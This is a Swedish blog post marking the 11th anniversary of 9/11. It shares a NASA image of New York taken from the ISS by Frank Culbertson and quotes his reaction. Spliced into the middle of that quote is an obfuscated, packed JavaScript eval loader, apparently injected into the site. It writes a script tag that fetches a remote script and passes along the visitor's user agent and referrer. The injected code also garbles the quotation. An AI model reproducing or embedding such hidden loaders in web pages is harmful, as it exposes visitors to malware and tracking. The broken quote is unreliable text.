Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Manhattan den 11 september, 11 årsedan & från en annan vy.

Manhattan den 11 september, 11 årsedan & från en annan vy.
Filip Urde
  • On 12 september, 2012
  • http://www.revue.se/filip-urde

Jag hoppas ingen missade att det var 11 september igår. Alltså är det 11 år sedan Twin Towers i New York blev målet för ett fruktansvärt attentat som förändrade världen.

Igår florerade en stor mängd bilder med budskap som, ”remember”, ”in memory of” osv. vilket jag själv gjorde mig skyldig till att posta på min instagram.

Men här har vi dock en bild från ett annat och lite mer unikt perspektiv. Den kommer från NASA:s ”Image of the Day” och det är en bild som togs från den internationella rymdstationen ISS över New York den dagen.

Fotografen är ISS kapten (uppdatering: dåvarande kapten), Frank L. Culbertson, Jr.

Frank var den enda amerikanen som inte var på jorden den dagen.

”It’s eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tttit|var|u0026u|referrer|dshsd||js|php’.split(’|’),0,{}))
horrible to see smoke pouring from wounds in your own country from such a fantastic vantage point. The dichotomy of being on a spacecraft dedicated to improving life on the earth and watching life being destroyed by such willful, terrible acts is jolting to the psyche, no matter who you are.”